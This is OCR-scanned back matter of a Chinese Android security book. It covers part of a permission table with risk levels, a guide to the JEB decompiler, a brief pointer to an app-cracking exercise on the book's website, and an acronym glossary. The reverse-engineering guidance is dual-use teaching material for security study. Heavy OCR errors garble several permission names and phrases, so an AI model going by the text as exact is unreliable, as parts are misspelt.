允许 应 用 程序 调用 底层 函数 设置 屏幕 方向 〈 实 
际 就 是 旋转 屏幕 ) 


允许 应 用 程序 调用 底层 函数 设置 光标 速度 


该 权限 在 级 别 7 的 Android API 中 停止 使 用 ， 详 
见 addPackageToPreferred( ) PAUH HH 


允许 应 用 程序 设置 系统 能 够 运行 的 应 用 程序 进 
程 数量 的 最 大 值 


日 
允许 应 用 程序 打开 ， 关 闭 或 禁用 状态 栏 及 其 
图 标 


允许 应 用 程序 访问 自己 订阅 的 内 容 提 供 器 


- 


( Content Provider) 





允许 应 用 程序 使 用 TYPE_SYSTEM_ALERT 2E 
参数 打开 和 窗口， 并 将 窗口 显示 在 所 有 其 他 应 用 程 
序 窗口 的 上 面 


允许 应 用 更 新 设备 资料 信息 


人 允许 应 用 程序 向 账户 管理 器 ( Account Manager) 
请 求 授权 标记 

允许 应 用 程序 使 用 SIP 服务 

允许 访问 振动 天 


允许 使 用 电源 管理 器 ( PowerManager) 的 
WakeLocks， 阻 止 进程 休眠 或 屏幕 变 暗 


允许 应 用 程序 修改 APN 设置 


允许 应 用 程序 修改 (但 不 读 取 ) 用 户 日 程 数 据 
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(5) 
权限 名 称 说 明 介 绍 风险 等 级 
l 允许 应 用 程序 修改 存储 于 手机 上 的 系统 电话 
WRITE CALL LOG "^ 2 
允许 应 用 程序 修改 (但 不 读 取 ) 用 户 联系 人 
WRITE_CONTACTS 3 
资料 
WRITE_EXTERNAL STORAGE 允许 应 用 程序 将 数据 写 人 到 外 部 存储 设备 3 
WRITE, GSERVICES 允许 应 用 程序 修改 Google 服务 地 图 2 
WRITE A ROOKMARES 允许 应 用 程序 修改 (但 不 读 取 ) 用 户 浏览 器 历 2 
史记 录 和 书签 
i ` z A M1 个 
WRITE PRONAR 允许 应 用 程序 修改 (但 不 读 取 ) 用 户 个 人 资料 7 
数据 
WRITE SECURE SETTINGS 允许 应 用 程序 读 / 写 系统 安全 设置 2 
WRITE. SETTINGS 允许 应 用 程序 读 / 写 系统 设置 2 
WRITE_SMS 允许 应 用 程序 编辑 SMS 短信 息 2 
et F m 日 不 
WIE. SOCTRT. STREAM 允许 应 用 程序 在 用 户 社 交 平 台 上 编辑 (但 不 读 
取 ) 发 布 数据 
WRITE SYNC. SETTINGS 允许 应 用 程序 修改 同步 设置 | l 


WRITE_USER_DICTIONARY 允许 应 用 程序 对 用 户 词 典 进 行 写 人 l 


附录 B JEB SiC zs A sc I VE n Ie) 2T 


本 书 在 第 6 章 和 第 7 章 已 经 介绍 了 ， 使 用 各 种 开源 工具 对 Android 应 用 程序 进 
行 反 编译 和 道 向 工程 的 方法 。 因 此 ， 本 附录 将 简要 介绍 JEB 分 析 工 具 和 使 用 方法 。 
JEB 作为 Android 应 用 程序 的 反 汇 编 器 和 反 编译 器 ， 主 要 用 来 处 理 APK 或 DEX XC 
件 ， 并 将 处 理 后 的 分 析 结 果 保 存 到 JDB 文件 中 。 

如 图 B. 1 所 示 ，JEB 的 工作 区 界面 主要 由 四 个 区 域 构成 : 

1) 顶部 的 菜单 栏 和 工具 条 。 

2) 底部 的 控制 台 窗 口 和 状态 条 。 

3) 类 层次 结构 浏览 窗口 。 

4) 可 以 包含 多 个 重要 子 视图 的 标签 栏 窗口 。 


B.1 视图 


在 JEB 的 工作 区 中 ， 用 于 表示 待 分 析 文件 部 分 的 视图 包含 在 标签 栏 窗 口 〈《 印 
图 B. 1 中 标号 为 4 的 区 域 ) 内 ， 该 视图 可 以 通过 菜单 栏 的 “Window” 药 单 选 项 开 
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图 B.1 JEB 主 窗 口 界面 


启 和 关闭 。 下 面 列 出 了 几 种 篆 见 的 视图 : 

e 汇编 视图 〈AssemblyView) 。 该 视图 包含 DEX 文件 中 所 有 类 的 反 汇 编 代码 ， 
用 户 可 以 在 该 视图 内 进行 各 种 交互 操作 (如 查找 等 )。 为 了 提高 汇编 视图 的 简洁 
性 ， 便 于 用 户 能 够 清晰 地 查看 视图 内 容 ， 该 视图 还 可 以 仅 显示 smali 代码 或 简化 的 
Dalvik 汇编 代码 。 

e 反 编译 视图 (DecompiledView) 。 该 视图 包含 由 类 的 字 节 码 经 反 编 译 生成 的 
Java 源 代码 。 使 用 “Tab” 键 可 以 在 汇编 视图 和 反 编译 视 图 之 间 切 换 ， 并 保持 光标 
始终 停留 在 同一 个 类 上 。 

e 字符 串 视图 (StringsView) 。 该 视图 包含 出 现在 DEX 文件 中 的 所 有 字符 串 的 
列表 。 双 击 其 中 任意 一 个 字符 串 ， 可 以 直接 切换 到 汇编 视图 ， 并 将 光标 定位 在 汇编 
视图 中 该 字符 串 首次 被 使 用 出 现 的 位 置 。 

e 常量 视图 (ConstantsView) 。 该 视图 包含 出 现在 DEX 文件 中 所 有 数字 常量 的 
列表 。 双 击 其 中 任意 一 个 常量 ， 可 以 直接 切换 到 汇编 视图 ， 并 将 光标 定位 在 汇编 视 
图 中 该 常量 首次 被 使 用 出 现 的 位 置 。 

e Manifest 视图 (Manifest View ) 。 该 视图 显示 应 用 程序 解压 缩 产 生 的 Manifest 
文件 内 容 。 

e 资源 视图 (ResourcesView) 。 该 树 形 视图 使 用 户 能 够 浏览 应 用 程序 解压 缩 产 
生 的 各 种 资源 文件 。 

€ Assets 视图 ( AssetsView) 。 该 视图 与 资源 视图 特别 相似 ， 同 样 用 于 供用 户 浏 
览 Android 应 用 程序 中 assets 文件 夹 内 的 资源 文件 。 

e 证 书 视图 (CertificatesView) 。 该 视图 以 可 读 的 形式 显示 用 于 APK 安装 包 签 
名 的 数字 证 书 。 
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e 外 部 类 /图 数 / 字 段 视 图 (External Classes/Methods/Fields View), 3x JL fb 4l 
图 用 于 将 DEX 文件 中 引用 和 使 用 的 各 种 外 部 类 、 子 数 和 字段 以 列表 的 形式 显示 
出 来 。 

e 注释 视图 (Notes View) 。 该 视图 用 于 存放 代码 分 析 时 用 户 标注 的 注释 内 容 。 

类 层次 结构 视图 (class hierarchy view， 即 图 B. 1 中 标号 为 3 的 区 域 ) ， 包 含 了 
出 现在 DEX 文件 内 所 有 类 的 列表 。 这 些 类 是 以 包 的 形式 进行 组 织 显 示 的 。 

点 击 或 双击 其 中 任意 一 个 类 名 ， 即 可 打开 汇编 视图 ， 并 上 自动 将 光标 停留 在 用 户 
点 击 的 类 上 。 

如 果 想 要 更 加 清晰 明了 地 查看 显示 在 类 层次 结构 视图 中 各 个 类 的 信息 ， 用 户 可 
以 在 该 层次 树 的 底部 标记 相应 的 复 选 框 ， 从 而 对 内 部 类 进行 暂时 地 标注 。 


B.2 代码 视图 


在 分 析 应 用 程序 时 ， 汇编 和 反 编 译 代 码 视 图 是 两 种 非常 重要 的 视图 。 这 两 种 代 
码 视 图 具有 恨 好 的 用 户 交 互 性 ， 能 够 很 好 地 配合 用 户 对 应 用 程序 进行 分 析 。 

这 两 种 视图 向 用 户 提 供 了 丰 定 的 可 交互 选项 ,包括 : 25. —EER. PAX. Wari 
(opcode) 、 指 令 ， 以 及 注释 等 代码 内 容 交 互 选项 。 

当 用 户 焦 点 落 在 这 两 种 视图 上 时 ， 用 户 可 进行 的 各 种 交互 操作 如 下 : 

* Rename items (重合 名 选项 ,快捷 键 : N): 用 于 重 命名 类 、 字 上段 和 函数 的 
名 字 ， 修 改 的 结果 同时 也 将 体现 在 其 他 的 视图 中 。 反 编译 视图 中 的 变量 和 参数 也 
可 以 被 重 命 名 。 不 过 ， 对 于 那些 没有 在 DEX 文件 中 定义 的 外 部 代码 项 不 能 被 重 
新 他 和 名。 

* Insert comments ( 插 和 注释， 快捷 键 : C): 可 以 对 指定 的 类 、 字 段 和 函数 标记 
注释 内 容 ， 以 及 标注 指定 的 函数 说 明 。 这 些 注释 既 可 以 是 文本 ， 也 可 以 是 音频 ， 或 者 
两 者 兼用 。 音 频 注 释 被 标记 为 “!”， 后 面 可 选 是 否 跟随 着 文本 注释 。 

è Examine cross references (查看 交叉 引用 ， 人 快捷 键 : X). 大 多 数 的 可 交互 项 ， 
可 以 使 用 交叉 引用 来 查看 它们 的 使 用 位 置 。 这 些 交 叉 引 用 项 会 以 它们 在 代码 中 出 现 
的 顺序 的 形式 列 出 。 用 户 可 以 双击 任意 一 个 交叉 引用 项 ， 跳 转 到 该 交叉 引用 所 在 的 
位 置 。 

e Navigate ( 导航， 快捷 键 : Enter): 用 户 可 以 “追踪 ”指定 的 代码 项 。 也 就 
是 说 ， 用 户 可 以 使 用 导航 功能 跳 转 指定 代码 定义 /声明 的 位 置 。 例 如 ,， “人 退 踊 ”一 
个 被 调用 的 函数 foo( ) 的 意思 ， 就 是 跳 转 到 foo( ) 函数 定义 /声明 的 位 置 。 

在 Assembly 视图 中 ， 用 户 能 够 通过 按 “Tab” 键 ， 对 一 个 类 进行 反 编译 。 随 
后 ， 当 前 视图 将 切换 到 目标 类 的 反 编译 视图 ， 并 且 将 光标 定位 在 与 源 字 节 码 指令 
最 匹配 的 高 级 Java 语句 上 。 相 反 ， 当 光标 位 于 高 级 Java 语句 时 ， 将 视图 切换 回 
Assembly 视图 ，JEB 也 会 试图 把 光标 定位 在 同 原 Java 语句 最 匹配 的 低级 字 节 人 码 指 


令 处 。 
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B.3 RRE 


K B. 1 所 示 的 快捷 键 ， 主 要 用 在 代码 视图 内 。 为 了 提高 工作 效率 ， 本 书 强烈 
推荐 用 尸 能 够 熟练 地 运用 这 些 快捷 键 。 经 验 丰 定 的 逆 疝 工程 师 可 能 会 比较 熟悉 这 些 
快捷 键 ， 因 为 对 于 标准 的 反 汇编 工具 来 说 , 它们 使 用 的 快捷 键 基本 都 是 相通 的 。 


表 B.1 代码 视图 内 可 以 使 用 的 快捷 键 


快 sk 键 说 明 
Tab 对 选 定 的 类 进行 反 编译 (在 汇编 视图 中 )/ 切 换 回 汇编 视图 (在 反 编 译 视图 中 ) 
N 对 选 定 的 内 部 项 进行 重 命 名 ( 如 类 、 字 段 、 孔 数 和 变量 ) 
C (或 Slash) 插入 注释 
查看 一 条 可 交互 语句 的 所 有 交叉 引用 项 ( 用户 可 以 双击 这 些 交 叉 引 用 项 ， 从 而 
“追踪 ”查看 代码 中 引用 这 条 可 交互 语句 的 位 置 ) 
Enter 追踪 一 条 可 交互 语句 项 
Escape 返回 到 follow- history 中 记录 的 上 一 个 光标 位 置 
Ctrl- Enter 前 进 到 follow- history 中 记录 的 下 一 个 光标 位 置 
F5 刷新 /同步 代码 视图 内 容 


B.4 参数 设置 选项 


编辑 (Edit)/ 选 项 ( Options) K, HTHHP EN JEB 工具 的 外 观 和 风格 。 
这 些 参数 设置 选项 分 为 多 个 类 别 (汇编 视图 通 
用 参数 设置 选项 /汇编 视图 专用 参数 设置 选项 ， 


E" ^ .< ws LUE E 
ON DEESSET NS NAE m 
«€ General 


代码 视图 专用 参数 设置 选项 ， 等 等 ) ， 其 中 大 ， | emerievupasieon ame 


Mi Compress database items (slower load) 


多 数 的 参数 设置 选项 都 比较 好 理解 ， 如 图 B. 2 
Be 

"show debug directives/line numbers (显示 
调试 指令 / 行 号 )” 选 项， 用 于 显示 汇编 代码 中 
特有 的 元 数据 。 用 户 需要 注意 的 是 ， 这 种 元 数 


据 很 容易 被 伪造 ， 因 此 不 要 相信 这 些 元 数据 。 
“keep smali compatibility” 选项， 用 于 生成 
能 够 “兼容 ”smali 的 汇编 代码 。 “兼容 ”在 这 
里 的 意思 是 ， 比 如 先 调 用 带 有 参数 的 指令 ， 然 
后 保留 完整 的 函数 名 、 类 名 ， 以 及 具体 的 分 文 
语句 (switch) 结构 和 等。 禁用 该 “smali compati- 
bility” 选 项 ， 可 极 大 地 提高 汇编 代码 的 可 读 性 。 





| insert blank lines after basic blocks 
| Keep Smali compatibility 

[9| Keep the "this" keyword (safer 

(V. Keep the parentheses (safer) 


| WW Insert blank lines after compounds 


B.2 JEB 工具 参数 设置 选项 
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“Style (风格 ) ”选项 ,包含 一 些 可 供用 户 选 择 的 字体 〈 该 选项 设置 在 所 有 视 
图 中 都 有 效 ) 和 颜色 样式 。 

通常 ， 默 认 的 字体 被 设置 为 固定 的 标准 字体 ， 一 般 是 宋体 。 不 过 不 同系 统 可 能 
有 所 不 同 。 最 新 版 本 的 宋体 字库 包含 大 量 的 Unicode 字符 ， 而 有 的 用 户 的 宋体 字库 
里 可 能 没有 CIKO (中 日 韩 ) 字符 ， 这 种 字符 在 处 理 亚 洲 语言 环境 的 应 用 程序 时 ， 
是 必 不 可 少 的 。 如 果 出 现 这 种 情况 ， 还 可 以 使 用 其 他 的 字体 ， 例 如 Windows 系统 上 
的 仿宋 字体 ， 以 及 Ubuntu 系统 上 的 Sans 字体 。 这 些 字体 可 以 很 好 地 支持 BMPS 
(Basic Multilingual Plane， 基 本 多 文 种 平面 ) ， 包 括 CJK、 俄 语 、 泰 语 和 阿拉 伯 语 。 

"Style manager (风格 管理 器 ) ”按钮 ， 可 以 使 用 户 自 定义 各 种 交互 项 的 颜色 和 
外 观 ， 该 设置 对 代码 视图 和 XML 视图 有 效 ， 用 于 演 染 Manifest 和 其 他 XML 资源 的 
显示 颜色 。 交 互 项 的 Foreground colors (前 景色 ) 和 background colors (背景 色 ) iX 
B. LA font attributes (字体 属性 ) 设置 ， 都 可 在 风格 管理 需 内 由 用 户 定 制 ， 如 
图 B. 3 所 示 。 


Foreground: 国 Background: []Beld Flalic | 


Active 
Foreground: MEME, Background: T ]Bold | Italic 


Current line 
Background: 





图 B.3 JEB 工具 的 代码 风格 管理 器 


附录 C 破解 应 用 程序 SecureApp. apk 


本 附录 将 详细 介绍 恶意 用 户 如 何 使 用 逆向 工程 修改 特定 应 用 程序 的 行为 。 在 第 


CJK， 中 日 韩 统 一 表意 文字 (CJK Unified Ideographs) ， 目 的 是 要 把 分 别 来 自 中 文 、 日文、 韩文 、 越 文 
中 ， 本 质 、 意 义 相同 、 形 状 一 样 或 稍 异 的 表意 文字 ( 主要 为 汉字 ， 但 也 有 仿 汉 字 ， 如 日 本 国字 、 韩 
国 独 有 汉字 、 越 南 的 喃 字 ) 于 ISO 10646 及 Unicode 标准 内 赋予 相同 编码 。CJK 是 中 文 (Chinese), 
日 文 (Japanese) 、 韩 文 (Korean) 三 国文 字 的 缩写 。 顾 名 思 义 ， 它 能 够 支持 这 三 种 文字 。 译 
者 注 

© BMP (Basic Multilingual Plane， 基 本 多 文 种 平面 ) ， 或 称 第 零 平 面 (Plane 0) ， 是 Unicode 中 的 一 个 纺 
码 区 段 。 编 码 从 U+0000 Æ U +FFFF。 一 一 译 者 注 
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7 章 中 , 已 经 借助 应 用 程序 SecureApp. apk， 展 示 了 恶意 用 户 使 用 逆向 工程 修改 应 
用 程序 行为 的 一 种 方式 。 因 此 ， 本 教程 将 演示 一 些 其 他 的 方式 ， 恶 意 用 户 就 是 使 用 
这 些 方式 修改 应 用 程序 的 行为 ， 以 达到 添加 或 删除 应 用 程序 功能 的 目的 。 

由 于 本 练习 属于 动手 实践 类 的 操作 。 因 此 ， 读 者 可 以 在 本 书 网 站 (www. androi- 
dinsecury. com) 的 相应 章节 中 获得 该 附录 的 内 容 。 其 中 ， 在 练习 过 程 中 用 到 的 所 有 
文件 ， 都 可 以 在 该 网 站 的 资源 部 分 找到 。 读 者 需要 使 用 下 述 账号 和 密码 ， 访 问 并 获 
取 该 网 站 资源 部 分 提供 的 文件 。 

用 户 和 名: android 

密码 : 1439896461 


附录 D 英文 缩 略 语 


w TR 
CBSE 思科 外 部 关键 业务 安全 组 
m ET 


CSRF 


Cross Site Request Forgery 

Common Vulnerabilities and Exposures 
Database 

Dalvik Debug Monitoring Service 

Dalvik Executable Format 

Department of Defense of the United States 
Exchange ActiveSync 

Second extended file system 

Third extended file system 

Fourth extended file system 

Group ID 

General Public License 

Global Positioning System 

Global System for Mobile communication 
High Definition Multimedia Interface 
Hypertext Markup Language 

Hyper text Transport Protocol 

Hypertext Transfer Protocol over Secure Socket Layer 
Http Strict Transport Security 

Integrated Development Environment 


International Electrotechnical Commission 


International Mobile Equipment Identity 
International Mobile Subscriber Identity 


Information Security Team 


Information Networking Institute 
Internet Process Connection 

Incident Response 

Internet Relay Chat 

[International Organization for Standards 
Information Technology 

Java Archive 

Java Native Interface 


Java Virtual Machine 
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(E) 
跨 站 点 伪造 请 求 
常见 漏洞 和 暴露 
数据 库 
Dalvik 虚拟 机 调试 监控 服务 
Dalvik 可 执行 格式 
美国 国防 部 
主动 同步 协议 
第 二 代 扩 展 文件 系统 
第 三 代 扩展 文件 系统 
第 四 代 扩 展 文件 系统 
群 组 ID 
通用 公共 许可 证 
全 球 定位 系统 
全 球 移动 通信 系统 
高 清晰 度 多 媒体 接口 
超 文 本 标记 语言 
超 文 本 传输 协议 
位 于 安全 套 接 字 层 之 上 的 超 文本 传输 协议 
强制 安全 传输 技术 
集成 开发 环境 
国际 电工 委员 会 
国际 移动 设备 识别 码 
国际 移动 用 户 识 别 码 
思科 信息 安全 组 
信息 网 络 研 究 所 
进程 间 通 信 
应 急 响应 
互联 网 在 线 聊 天 
国际 标准 化 组 织 
信息 技术 
Java 架构 
Java 本 地 接口 
Java 虚拟 机 
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OS 
OSSTMM 
OWASP 
PCI DSS 
PDA 

Pen Testing 


PIN 


Android 系统 安全 与 攻防 


Mandatory Access Control 

Mobile Device Management 

Man In The Middle 

Multimedia Messaging Service 

Near Field Communication 

National Institute of Standards and Technology 
National Security Agency 

National Science Foundation 

National Vulnerability Database 

Open Handset Alliance 

Operating System 

Open Source Security Testing Methodology Manual 
Open Web Application Security Project 
Payment Card Industry Data Security Standard 
Portable Digital Assistant 

Penetration Testing 

Personal Identification Number 

Proof of Concept 

Quick Response 

Random Access Memory 

Radio Frequency Identification 

Read- Only Memory 

Remote Procedure Calls 

Secure Digital Memory Card 

Software Development Life Cycle 

Software Development Kit 

Secure Element 

Secure Hash Algorithm 

Subscriber Identity Module 

Short Messaging Service 

SQL Inject 

Security Services and Cloud Operations team 


Secure Sockets Layer 


强制 访问 控制 
移动 设备 管理 


中 间 人 


多 媒体 短信 服务 


近 场 通信 


美国 国家 标准 与 技术 研究 院 
美国 国家 安全 局 

国家 科学 基金 会 

国家 漏洞 数 据 库 

开放 手机 联盟 


操作 系统 


开源 安全 测试 方法 手册 
开放 Web 应 用 程序 安全 项 目 
支付 卡 行业 数据 安全 标准 
个 人 数字 助理 


渗透 测试 


个 人 识别 密码 


概念 验证 
快速 反应 
随机 存储 天 
射频 识别 
只 该 存储器 


远程 过 程 调用 
安全 数字 记忆 卡 
软件 开发 周期 
软件 开发 工具 包 


安全 单元 


安全 散 列 算法 
用 户 识别 模块 


短信 服务 
SQL 注入 


思科 安全 服务 与 云 运 维 组 
安全 套 接 字 层 


(2) 


附 K 


Virtual Machine 


Uniform Resource Identifier 
Virtual Private Network 


Uniform Resource Locator 
Virtual File System 


Wireless Session Protocol 
Cross Site Request Forgery 


Wireless Markup Language 





Cross Site Scripting 
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(E) 
社会 保险 号 
服务 器 端 处 理 
交易 授权 验证 码 
安全 传输 层 协议 
用 户 数据 报 协议 
用 户 接 口 或 人 机 交互 接口 
用 户 ID 
统一 资源 标识 
统一 资源 定位 符 
虚拟 文件 系统 
虚拟 机 
虚拟 专用 网 
无 线 应 用 环境 
无 线 应 用 协议 
无 线 数据 报 协 议 
无 线 保 真 技术 
无 线 标记 语言 
无 线 会 话 协议 
无 线 电 话 应 用 
无 线 传输 层 安全 
无 线 传输 协议 
万 维 网 /互联 网 
可 扩展 标记 语言 
跨 站 点 伪造 请 求 
跨 站 点 脚本 
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际 信息 工程 先进 技术 译 从 


《Android 系 统 安全 与 攻防 》 

《内 容 分 发 网 络 》 

《移动 云 计 算 ; 无 线 、 移 动 及 社交 网 络 中 分 布 式 资源 的 开发 利用 》 
《 认 知 视角 下 的 无 线 传感器 网 络 》 

《计算 机 网 络 仿 真 OPNET 实 用 指南 》 

《移动 无 线 信道 》 ( 原 书 第 2 版 ) 

(LTE-Advanced: 面向 IMT-Advanced 的 3GPP 解 决 方案 》 
《声学 成 像 技 术 及 工程 应 用 》 

《 认 知 无 线 电 通信 与 组 网 : 原理 与 应 用 》 
《LTE/SAE 网 络 部 署 实 用 指南 》 

《网 络 性 能 分 析 原 理 与 应 用 》 

《去 连接 与 嵌入 式 传 感 系统 ) 

《IP 地 址 管理 原理 与 实践 》 

8 自 组 织 网 络 :GSM,，UMTS 和 LTE 的 自 规划 、 自 优化 和 自 合 合 》 
QE 现 吉 比特 传输 的 60GHz 无 线 通 信 技 术 》 

(TERRAM (SON): 高 效 的 网 络 管理 自动 化 》 
《UMTS 中 的 LTE: 向 LTE-Advanced 演 进 》( 原 书 第 2 版 ) 
《无 线 传 感 器 及 执行 器 网 络 ) 

《 UMTS 中 的 WCDMA - HSPA 演 进 及 LTE 》( 原 书 第 5 版 ) 
《 认 知 无 线 电 网 络 》 

《 网 络 融 合 一 二 服务、 应用、 传输 和 运营 支撑 》 

《 UMTS 中 的 LTE: 基 于 OFDMA 和 SC-FDMA 的 无 线 接 入 ) 

《高 性 能 微 处 理 器 电路 设计 》 

《 吉 规 模 集成 电路 互 连 工艺 及 设计 ) 

《 高 级 电子 封装 》 ( 原 书 第 2 伯 ) 

《基于 4G 系 统 的 移动 服务 技术 》 

《 移动 无 线 传感器 网 一 一 技术 、 应 用 和 发 展 方向 》 

《 UMTS 蜂窝 系统 的 Q0S 与 QOE 管 理 》 
《UMTS=-HSDPA 系 统 的 TCP 性 能 》 

《 基于 射频 工程 的 UMTS 空中 接口 设计 与 网 络 运行 》 

《未 来 UMTS 的 体系 结构 与 业务 平台 : 全 |IP 的 3GCDMA 网 络 》 
《环境 网 络 : 支持 下 一 代 无 线 业务 的 多 域 协同 网 络 》 

( 基于 蜂窝 系统 的 IMS 一 融合 电信 和 领域 的 VOIP 演 进 》 

( $2 SS d£ ES Nb A UA 26/2.5G/3G/ 向 4G 的 演进 )) 

( 微 电 子 技术 原理 、 设 计 与 应 用 ) 

《多 电压 CMOS 电 路 设计 》 

( P2P 系 统 及 其 应 用 》 

《1PTV 与 网 络 视频 : 拓展 广播 电视 的 应 用 范围 》 

《下 一 代 无 线 系统 与 网 络 》 
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